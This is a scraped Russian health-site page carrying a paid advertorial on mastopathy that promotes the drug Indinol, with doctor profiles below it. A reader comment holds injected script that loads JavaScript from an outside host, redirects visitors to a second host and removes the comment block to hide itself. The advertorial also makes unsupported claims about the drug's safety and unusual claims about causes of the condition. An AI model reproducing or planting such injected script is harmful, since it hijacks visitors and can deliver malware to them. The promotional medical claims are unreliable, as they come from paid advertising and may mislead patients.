Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мастопатия: проще предупр...  >>  Мастопатия: проще предупредить
 
Обратная связь
 

Мастопатия: проще предупредить

Размер шрифта
19 февраля 2012 00:00
  • google_analytics: false
  • Нравится

Те, кто свыкается с мастопатией, вместо того, чтобы обратиться к врачу, предпочитают перетерпеть, не догадываются, что такое «терпение может закончиться плачевно: раком груди. Как лечить мастопатию и можно ли ее предотвратить?

1 
Рак груди в 3-5 раз чаще возникает на фоне мастопатии. Поэтому если вы думаете, что все пройдет само, вы сильно рискуете. Профилактика и лечение мастопатии одновременно является профилактикой рака молочной железы.

Женский организм цикличен и в норме живет в соответствии с четкими биологическими ритмами: суточными, месячными, годовыми. Колебания гормонов – эстрогена и прогестерона – регулируют менструальный цикл, зачатие, беременность, роды, кормление грудью.

1Что может нарушить этот баланс?

  • Стрессы, неврозы и депрессии.
  • Нерегулярная половая жизнь, воздержание.
  • Частая смена партнера.
  • Раннее отлучение ребенка от груди. Когда грудное вскармливание обрывается резко – развивается гормональный стресс.
  • Опасны любые воздействия: случайное сдавливание или удар молочных желез в общественном транспорте, повреждение груди во время тренировки, ношение тесного, сдавливающего белья.

Что делать?

  1. Обследовать грудь. Это можно делать самостоятельно или на приеме у гинеколога, маммолога. 1Повторяя это исследование ежемесячно, вы научитесь улавливать малейшие отклонения в состоянии молочной железы. Ваша внимательность позволит врачу диагностировать заболевание на ранней стадии.

  2. Обязательно сходить к врачу. Многие женщины, обнаружив у себя мастопатию, боятся идти к врачу и не догадываются, что современная медицина предлагает широкий спектр медикаментозного лечения, в том числе и негормонального.

Как лечить мастопатию?

В аптеках представлены средства против мастопатии, например, новое, безопасное, негормональное средство Индинол. Он уникален тем, что, в первую очередь, устраняет саму причину заболевания, а потом и его симптомы.

1
Индинол разработан коллективом врачей и ученых Научно-исследовательского института молекулярной медицины при Московской медицинской академии (ММА) И.М.Сеченова и Всероссийского научного центра молекулярной диагностики и лечения (ВНЦМДЛ).

1Важно помнить, что мастопатия лечится! И это надо знать каждой женщине. При первых признаках заболевания, безусловно, нужно обращаться к врачу. А также следить за своим здоровьем самостоятельно, уделяя организму столько же внимания, как и любимому ребенку, семье, работе. Запомните, мастопатия – это не приговор!

Подробнее вы можете читать на сайте www.indinol.ru.

Получить консультацию и задать свои вопросы вы можете по бесплатному телефону горячей линии: 8 (800) 555-8-800.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:55

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.